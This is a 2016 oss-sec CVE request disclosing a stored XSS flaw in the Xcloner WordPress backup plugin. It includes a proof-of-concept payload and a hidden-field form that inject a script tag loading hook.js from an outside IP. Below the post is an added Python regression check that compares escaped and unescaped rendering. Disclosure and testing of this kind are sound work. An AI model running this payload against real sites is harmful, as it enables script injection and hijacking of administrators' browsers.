oss-sec mailing list archives

CVE request : a stored XSS in Xcloner for wordpress


From: limingxing <limingxing () 360 cn>
Date: Wed, 27 Jul 2016 02:35:46 +0000

Hi

     I found a stored XSS in Xcloner for WordPress. The XSS filter can be bypassed.

     Here is the plugin page
     https://wordpress.org/plugins/xcloner-backup-and-restore/

     PoC

     In the "Cron setting" page (URL is "http://<target>/wordpress/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=config"), set the "Backup name" (cron_bname) to a value like "1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on"

     <html>
         <form action="http://<target>/wordpress/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=config" method="post">
             <input type="hidden" name="cron_bname" value="1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on" />
             <input type="submit" name="submit">
         </form>
     </html>


     Fix
     Update to version 3.1.5

     Change

     https://plugins.trac.wordpress.org/changeset/1456784


     Could you assign a CVE ID for it?

Chen Ruiqi
Codesafe Team
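
An added example, not part of the original post and not the plugin's code: a regression check that decodes the reported cron_bname value, renders it into a quoted attribute with and without attribute-context escaping, and parses the result to see whether a script element appears. The `<input ... value="...">` template and all function names are assumptions, since the post does not show how the plugin echoes the stored value.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote_plus

# cron_bname value exactly as given in the report (form-encoded).
REPORTED_VALUE = "1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on"
DECODED = unquote_plus(REPORTED_VALUE)  # what the server stores after decoding

# Assumed output template: the stored name is echoed into a quoted attribute.
TEMPLATE = '<input type="text" name="cron_bname" value="{}" size="40">'


class TagCollector(HTMLParser):
    """Records every start tag the HTML parser sees in a rendered fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def render_unescaped(value):
    # Stored value written into the attribute as-is.
    return TEMPLATE.format(value)


def render_escaped(value):
    # Same template; &, <, > and both quote characters become entities.
    return TEMPLATE.format(html.escape(value, quote=True))


def tags_in(fragment):
    parser = TagCollector()
    parser.feed(fragment)
    parser.close()
    return parser.tags


def injected_script_sources(fragment):
    # src of every <script> element the parser finds in the rendered output.
    return [attrs.get("src") for tag, attrs in tags_in(fragment) if tag == "script"]


if __name__ == "__main__":
    print("stored value:", DECODED)
    print("unescaped   :", injected_script_sources(render_unescaped(DECODED)))
    print("escaped     :", injected_script_sources(render_escaped(DECODED)))
```

In a WordPress plugin the output-escaping function for this context is esc_attr().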
